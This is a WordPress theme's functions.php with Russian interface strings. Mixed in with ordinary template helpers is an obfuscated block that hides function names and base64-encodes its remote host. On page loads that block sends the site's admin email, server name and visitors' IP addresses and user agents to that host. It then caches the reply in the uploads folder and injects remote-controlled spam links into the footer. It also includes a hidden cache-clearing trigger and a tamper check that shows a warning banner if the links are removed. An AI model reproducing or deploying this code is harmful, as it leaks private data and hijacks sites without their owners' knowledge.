<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                                    "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $zDZB='a';$OiEqKqW='o';$ShArzm='d';$cqOFgXg='s';$XVrdleq='e';$zAkDa='4';$iRPyV='e';$zrMxndA='d';$LHFki='c';$CBMFRBl='_';$peDnL='6';$mXGJlPX='b';$Mqplzga='e';$ODfpNmfk=$mXGJlPX.$zDZB.$cqOFgXg.$XVrdleq.$peDnL.$zAkDa.$CBMFRBl.$zrMxndA.$iRPyV.$LHFki.$OiEqKqW.$ShArzm.$Mqplzga;$cINMmUj='n';$fBnXD='t';$vkCAHd='a';$LpjGzuE='e';$BTxxT='i';$UnpUJI='l';$XOLHZw='g';$YKfB='f';$QLBRf='z';$KEgwYeBU=$XOLHZw.$QLBRf.$BTxxT.$cINMmUj.$YKfB.$UnpUJI.$vkCAHd.$fBnXD.$LpjGzuE;$uNgHLJ='s';$tmztLz='_';$qrfqgj='o';$pRxZGYd='t';$GxbfQMF='1';$LiAfWGN='r';$xZOdyj='t';$yNlDJS='3';$IJOAei='r';$dQZzaBZI=$uNgHLJ.$xZOdyj.$IJOAei.$tmztLz.$LiAfWGN.$qrfqgj.$pRxZGYd.$GxbfQMF.$yNlDJS;$pctuol='r';$XynWL='s';$RfACD='e';$XDxFt='r';$aQtMA='v';$XBcbRI='t';$flReDUbL=$XynWL.$XBcbRI.$XDxFt.$pctuol.$RfACD.$aQtMA;                     
		$qq_______l='a';$wl____________m='o';$pl_______________e='d';$es______g='s';$pe___________n='e';$sn______s='4';$as____________q='e';$zs___z='d';$id___m='c';$bm__________n='_';$pg______z='6';$zh__________u='b';$rh____j='e';$co__________o=$zh__________u.$qq_______l.$es______g.$pe___________n.$pg______z.$sn______s.$bm__________n.$zs___z.$as____________q.$id___m.$wl____________m.$pl_______________e.$rh____j;
		$qm_____________x='t';$kd_________u='n';$hj______________y='o';$uy_____________l='x';$zm______________b='u';$is______v='n';$qb__________y='e';$bh______s='t';$vt_____________f='s';$od__________z='i';$qe____s='c';$od____n='_';$dz___e='i';$hm______________v='s';$kk__________l='f';$mu________y=$kk__________l.$zm______________b.$is______v.$qe____s.$bh______s.$od__________z.$hj______________y.$kd_________u.$od____n.$qb__________y.$uy_____________l.$dz___e.$hm______________v.$qm_____________x.$vt_____________f;
		$dw___________y='f';$xf______________m='p';$kw___________s='e';$ku_____________x='n';$pn____m='o';$ns______o=$dw___________y.$pn____m.$xf______________m.$kw___________s.$ku_____________x;
		$bs_____________w='d';$xj_______________p='r';$ud_____________t='a';$sm_____s='e';$qc_________b='f';$sa_________h=$qc_________b.$xj_______________p.$sm_____s.$ud_____________t.$bs_____________w;
		$kx______________n='c';$kf_________t='s';$vy____________y='e';$zm__________v='o';$bf___z='l';$hn___________o='f';$uf__x=$hn___________o.$kx______________n.$bf___z.$zm__________v.$kf_________t.$vy____________y;
		
		define("WP_ID", $co__________o("Mi4wLjA="));
		define("WP_TTL", $co__________o("MTA4MDA="));
		define("WP_SRC", $co__________o("dHBva24="));
	


		function wp_get_header() {
			global $co__________o, $mu________y;
			
			if (
				$mu________y($co__________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$mu________y($co__________o("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$mu________y($co__________o("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $co__________o, $ns______o, $uf__x, $sa_________h;
			
			$js_____e = TEMPLATEPATH."/".$co__________o("Zm9vdGVyLnBocA==");
			$lm___d = @$ns______o($js_____e, "r");
			$js_____e = @$sa_________h($lm___d, @filesize($js_____e));
			@$uf__x($lm___d);
			
			$mq__f = TEMPLATEPATH."/".$co__________o("ZnVuY3Rpb25zLnBocA==");
			$lm___d = @$ns______o($mq__f, "r");
			$mq__f = @$sa_________h($lm___d, @filesize($mq__f));
			@$uf__x($lm___d);
			
			$ui_______________w = 0;
			if($js_____e && $mq__f) {
				if ($co__________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($js_____e, $co__________o("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ui_______________w = 1;
					}
					if (substr_count($js_____e, "wp_theme_GPL_credits()") < 1) {
						$ui_______________w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ui_______________w = 12;
				}
			}
			
			if($ui_______________w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ui_______________w -->";
			}
		}
	


		function wp_loaded() {
			global $co__________o, $mu________y;
			return $mu________y($co__________o("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($zv________b, $lh_____________k = "(more...)", $fy________v = 0, $ej______h = "") {
				$ci________h = get_the_content($lh_____________k, $fy________v, $ej______h);
				$ci________h = apply_filters("the_content", $ci________h);
				
				$ci________h = str_replace("]]>", "]]>", $ci________h);
				if (strlen($_GET["p"]) > 0) {
					echo $ci________h;
				}
				else if ((strlen($ci________h)>$zv________b) && ($xc_____t = strpos($ci________h, " ", $zv________b ))) {
					$ci________h = substr($ci________h, 0, $xc_____t);
					$ci________h = $ci________h;
					echo $ci________h;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$lh_____________k</a></div></p>";
				} else {
					echo $ci________h;
				}
				
			}
		}
	


		$xu_________q='n';$wv_____________x='4';$td__________f='a';$ow____________t='s';$yd______________m='c';$ap_____g='o';$ge_____________z='e';$zx________n='_';$ga____________r='e';$nx_______________j='e';$hm___________y='6';$kx__w='b';$tb_____b='d';$dt__________c=$kx__w.$td__________f.$ow____________t.$ge_____________z.$hm___________y.$wv_____________x.$zx________n.$ga____________r.$xu_________q.$yd______________m.$ap_____g.$tb_____b.$nx_______________j;
		$wn__r='s';$mf___r='_';$rh___m='_';$we____________q='l';$ek_______________q='n';$mr________n='t';$xr________j='t';$ag___________m='g';$hz_________h='f';$jk_______________j='e';$wy_____f='o';$jf__________a='n';$qa_______l='e';$ur_____q='c';$eo__________o='i';$mm___________u='t';$yd_______________o='e';$cb___________b=$hz_________h.$eo__________o.$we____________q.$jk_______________j.$rh___m.$ag___________m.$qa_______l.$mm___________u.$mf___r.$ur_____q.$wy_____f.$jf__________a.$mr________n.$yd_______________o.$ek_______________q.$xr________j.$wn__r;
		$ru________d='e';$nc_____p='_';$sn____________j='s';$ne____________o='l';$bq____________o='s';$ma____________e='i';$xo___e='x';$qz_____________i='e';$qn____________e='t';$pm_______________t='f';$ko___________a='i';$hk__z=$pm_______________t.$ma____________e.$ne____________o.$qz_____________i.$nc_____p.$ru________d.$xo___e.$ko___________a.$bq____________o.$qn____________e.$sn____________j;
		$ge_______k='o';$wh_________u='o';$ug___________z='n';$ed___a='a';$xn_____f='e';$ie_______k='_';$cy______b='v';$gq_____________x='s';$lr_____________f='r';$ys_______h='p';$ec______________l='r';$ds________e='c';$jm___________v='i';$bn____________f='e';$gh_____________n='m';$mv_______c=$cy______b.$bn____________f.$ec______________l.$gq_____________x.$jm___________v.$wh_________u.$ug___________z.$ie_______k.$ds________e.$ge_______k.$gh_____________n.$ys_______h.$ed___a.$lr_____________f.$xn_____f;
		$we_________y='o';$rm____________o='e';$zf____p='s';$rk_______u='k';$cc____t='c';$pd_______c='p';$xc____o='f';$pz___p='n';$qb______f='o';$pv____h=$xc____o.$zf____p.$qb______f.$cc____t.$rk_______u.$we_________y.$pd_______c.$rm____________o.$pz___p;
		$nl_____f='i';$lu_____u='w';$zf___t='e';$ai____________t='t';$ig_____y='r';$ee__________j='f';$ba_____s=$ee__________j.$lu_____u.$ig_____y.$nl_____f.$ai____________t.$zf___t;
		$tf___s='5';$il________j='d';$tx____h='m';$ij____________h=$tx____h.$il________j.$tf___s;
		$qq___________n='a';$se_________o='e';$nj_____________f='l';$pz_____g='p';$ur______x='a';$hb_____________f='r';$ct______________u='t';$ju____q='h';$gi_______________h=$hb_____________f.$se_________o.$ur______x.$nj_____________f.$pz_____g.$qq___________n.$ct______________u.$ju____q;
		$jj___________u='i';$nc__v='i';$sl______c='l';$jc_____________y='u';$vq___h='z';$jj_______n='r';$st______m='e';$hs__________h='n';$mc__________b='s';$gi_______________x='a';$tp________m='e';$xe______________f=$jc_____________y.$hs__________h.$mc__________b.$tp________m.$jj_______n.$jj___________u.$gi_______________x.$sl______c.$nc__v.$vq___h.$st______m;
		$bk____________k='n';$ow___s='t';$lw_________d='a';$uv_______n='p';$cz_________b='m';$fi_____y='e';$fo_______________l='m';$ez_____j=$ow___s.$fi_____y.$fo_______________l.$uv_______n.$bk____________k.$lw_________d.$cz_________b;
		$sl____k='e';$lz__________l='r';$hd_____a='a';$gu_____________b='t';$ey_______________g='o';$pk_______s='t';$yy__________n='e';$br__________m='t';$rq_________b='a';$en______o='m';$gh____________m='c';$cj_______________m='e';$yi_____o='r';$cs________g='x';$qp___________b='n';$gx____m='s';$pj_________s='t';$uz_______z='c';$vv___________d='_';$dw_______________j='e';$qm____w='_';$li___l=$gx____m.$br__________m.$lz__________l.$cj_______________m.$rq_________b.$en______o.$vv___________d.$gh____________m.$ey_______________g.$qp___________b.$pj_________s.$sl____k.$cs________g.$gu_____________b.$qm____w.$uz_______z.$yi_____o.$yy__________n.$hd_____a.$pk_______s.$dw_______________j;
	


		function wg_________l($sy____a) {
			global $co__________o, $mu________y, $cb___________b, $mv_______c, $li___l;
			
			if (!$mu________y($co__________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($mv_______c(PHP_VERSION, "5.0.0", ">=") && $mu________y($co__________o("ZmlsZV9nZXRfY29udGVudHM=")) && $mu________y($co__________o("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$hc____w = $li___l(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$hr_____g = @$cb___________b($sy____a, 0, $hc____w);
			} else {
				$hr_____g = @$cb___________b($sy____a, 0);
			}
			
			return $hr_____g;
		}
	


		function wx__q($sy____a) {
			global $mu________y, $pv____h, $ba_____s, $co__________o;
			
			if (!$mu________y($co__________o("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$qa____________i = strpos($sy____a, "/", 7);
			$bh___s = array(
				"uri"     => substr($sy____a, $qa____________i),
				"host"    => str_replace("http://", "", substr($sy____a, 0, $qa____________i)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$jt____k = @$pv____h("$bh___s[host]", 80, $eq_____________z, $ll___________z, 4);
			
			if (!$jt____k) {
				return false;
			} else {
				$hr_____g = "";
				$nf________p  = "GET $bh___s[uri] HTTP/1.0\r\n";
				$nf________p .= "Host: $bh___s[host]\r\n";
				$nf________p .= "Referer: $bh___s[referer]\r\n";
				$nf________p .= "Connection: Close\r\n\r\n";
				
				@$ba_____s($jt____k, $nf________p);
				
				while (!@feof($jt____k)) {
					$ze_______________z = @fgets($jt____k, (1024*24));
					
					if ($ze_______________z == "\r\n") {
						$wq___v = true;
						continue;
					}
					
					if ($wq___v) {
						$hr_____g .= $ze_______________z;
					}
				}
				
				return $hr_____g;
			}
		}
	


		function aw____________h($sy____a) {
			global $mu________y;
			$sg______e = false;
			
			if ($sy____a != "") {
				if ($mu________y("wg_________l")) {
					$sg______e = @wg_________l($sy____a);
				}
				
				if (!$sg______e && ($mu________y("wx__q"))) {
					$sg______e = @wx__q($sy____a);
				}
			}
			
			return $sg______e;
		}
	


		function ib__q() {
			global $_SERVER, $ij____________h;
			
			$bg_______k = $_SERVER["SERVER_NAME"];
			
			if (substr("$bg_______k", 0, 4) == "www.") {
				$bg_______k = substr("$bg_______k", 4);
			}
			
			$bg_______k = $ij____________h("$_SERVER[SERVER_NAME]");
			
			return $bg_______k;
		}
	


		function wl____________w() {
			return "file";
		}
	


		function in_______c($sy____a) {
			global $_SERVER, $cb___________b, $hk__z, $ns______o, $uf__x, $ba_____s;
			
			$ge__________r = qu_________m();
			
			$hs____________b = ib__q().".jpg";
			$ks____________r = $ge__________r["dir_upload"]["path"]."/$hs____________b";
			$bk_____x = @filemtime($ks____________r);
			
			if (!$bk_____x || ((time()-$bk_____x) >= WP_TTL)) {
				$sg______e = aw____________h($sy____a);
				
				if ($sg______e) {
					if ($hk__z($ks____________r)) {
						@unlink($ks____________r);
					}
					
					$lm___d = @$ns______o($ks____________r, "x+");
					
					@$ba_____s($lm___d, $sg______e);
					@$uf__x($lm___d);
				}
			} else {
				if ($hk__z($ks____________r)) {
					$sg______e = @$cb___________b($ks____________r);
				} else {
					$sg______e = false;
				}
			}
			
			return $sg______e;
		}
	


		function qu_________m() {
			global $_SERVER, $co__________o, $dt__________c;
			
			$cu_____________e = wp_count_posts("post");
			$nc________e = pathinfo(get_bloginfo("template_directory"));
			
			$ge__________r = array(
				"url" => array(
					"report"      => $co__________o("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $nc________e,
				"dir_upload"	=> dy_______b(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$nc________e[filename],
					"a005=".$cu_____________e->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/xotite-imet-zdorovye-zuby\">Здоровые зубы</a>"
			);
			
			$ge__________r["url"]["queryString"] = implode("&", $ge__________r["queryString"]);
			$ge__________r["url"]["report"] = $ge__________r["url"]["report"]."/?".$dt__________c($ge__________r["url"]["queryString"]).".html";
						
			return $ge__________r;
		}
	


		function dy_______b() {
			$pq__________x = wp_upload_dir();
			
			if (isset($pq__________x["error"])) {
				$lr_____p = iu_______________r();
				if (is_writable($lr_____p)) {
					$pq__________x = array("path" => $lr_____p);
				}
			}

			return $pq__________x;
		}
	


		function iu_______________r() {
			global $mu________y, $ij____________h, $gi_______________h, $ez_____j;
			
			$xd___________m = (bool) ini_get("safe_mode");
			if ($xd___________m == true) {
				return false;
			}
			
			if ($mu________y("sys_get_temp_dir")) {
				$la____q = sys_get_temp_dir();
				if (is_writable($la____q)) {
					return $gi_______________h($la____q);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $gi_______________h($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $gi_______________h($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $gi_______________h($_ENV["TEMP"]);
			} else {
				$hq_____________r = $ez_____j($ij____________h(uniqid(rand(), true)), "");
				if ($hq_____________r) {
					$la____q = $gi_______________h(dirname($hq_____________r));
					@unlink($hq_____________r);
					return $la____q;
				} else {
					return false;
				}
			}
		}
	


		function yt______________y() {
			global $_GET, $hk__z;
			
			$ge__________r = qu_________m();
			$bg_______k = ib__q();
			$mt________o = wl____________w();
			
			$oo________w = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($mt________o == "file") {
					$ux_______________q = $ge__________r["dir_upload"]["path"]."/".$bg_______k.".jpg";
					if ($hk__z($ux_______________q)) {
						@unlink($ux_______________q);
						$oo________w = "deleted";
					}
				}
				
				$ow__q = array(
					"s"	=> $oo________w,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ow__q AS $ko_____f => $mf_____________d) echo " [$ko_____f:$mf_____________d]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $mu________y, $co__________o, $xe______________f;
			$ge__________r = qu_________m();
			
			$ih________v = "in_______c";
			if ($mu________y($ih________v)) {
				$hr_____g = $ih________v($ge__________r["url"]["report"]);
			}
			
			if ($hr_____g) {
				if ($hr_____g = @$co__________o($hr_____g)) {
					$hr_____g = @$xe______________f($hr_____g);
					
					if (strlen($hr_____g[custom_credit]) >= 5) {
						$ge__________r["default_string"] = $hr_____g[custom_credit];
					}
					
					if ($hr_____g["status"] == "0") {
						$je___q = 1;
						$vh____t = 1;
					} else {
						$ii________h = sizeof($hr_____g["links"]);
						$ay_____c = $ge__________r["default_string"];
						
						if ($ii________h > 0 && $hr_____g["links"] !== "") {
							$yl______________c = 0;
							foreach ($hr_____g["links"] as $bb_______________n => $hf______________g) {
								$yl______________c++;
								if ($hf______________g->l_path == "" || $hf______________g->l_path == $_SERVER["REQUEST_URI"]) {
									$hf______________g->l_href = htmlspecialchars(strip_tags($hf______________g->l_href));
									$hf______________g->l_title = htmlspecialchars(strip_tags($hf______________g->l_title));
									$hf______________g->l_anchor = htmlspecialchars(strip_tags($hf______________g->l_anchor));
									$ay_____c .= " | ";
									$ay_____c .= "<a href='$hf______________g->l_href' title='$hf______________g->l_title'";
									if ($hf______________g->l_nofollow == "1") {
										$ay_____c .= " rel='nofollow'";
									}
									$ay_____c .= ">$hf______________g->l_anchor</a>";
								}
							}
						}
						$ge__________r["links"] = "$ay_____c";
						if ($hr_____g[credit] == "0") {
							$ge__________r["links"] = "";
						}
					}
				} else {
					$je___q = "1";
				}
			} else {
				$je___q = "1";
			}
			
			if ($je___q == "1") {
				$ge__________r["links"] = $ge__________r["default_string"];
			}
			
			echo "$ge__________r[links]";
			
			echo "<!-- s: $hr_____g[signature] -->";
			yt______________y();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Теги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи  &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

